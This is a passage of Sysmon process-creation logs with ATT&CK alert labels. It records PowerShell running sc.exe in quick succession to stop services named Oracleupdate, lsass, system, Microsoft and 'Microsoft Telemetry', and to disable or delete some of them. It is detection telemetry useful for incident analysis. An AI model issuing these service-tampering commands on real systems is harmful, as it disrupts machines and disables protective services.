{df9fc3d3-b393-5ecf-0000-001011eb2000} +ProcessId: 2532 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.478032900Z"",""eventRecordID"":""2620"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.475\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001011eb2000}\r\nProcessId: 2532\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.475"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001011eb2000}"",""processId"":""2532"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.731",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.461 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001049ea2000} +ProcessId: 7976 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Oracleupdate Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Oracleupdate Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.464047100Z"",""eventRecordID"":""2619"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.461\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001049ea2000}\r\nProcessId: 7976\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Oracleupdate Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.461"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001049ea2000}"",""processId"":""7976"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Oracleupdate Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.405 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010bae82000} +ProcessId: 7312 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.409182600Z"",""eventRecordID"":""2617"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.405\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010bae82000}\r\nProcessId: 7312\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.405"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010bae82000}"",""processId"":""7312"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.635",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.254 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-0010e8de2000} +ProcessId: 8188 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.256681100Z"",""eventRecordID"":""2614"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.254\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-0010e8de2000}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.254"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-0010e8de2000}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.605",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.216 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001057dd2000} +ProcessId: 4516 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.219002800Z"",""eventRecordID"":""2612"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.216\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001057dd2000}\r\nProcessId: 4516\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.216"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001057dd2000}"",""processId"":""4516"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.590",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.197 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001090dc2000} +ProcessId: 3564 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop lsass +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop lsass",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:27.202142400Z"",""eventRecordID"":""2611"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:27.197\r\nProcessGuid: {df9fc3d3-b393-5ecf-0000-001090dc2000}\r\nProcessId: 3564\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop lsass\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:27.197"",""processGuid"":""{df9fc3d3-b393-5ecf-0000-001090dc2000}"",""processId"":""3564"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop lsass"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:57.541",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:27.128 +ProcessGuid: {df9fc3d3-b393-5ecf-0000-001025da2000} +ProcessId: 1988 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Microsoft Telemetry"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Microsoft 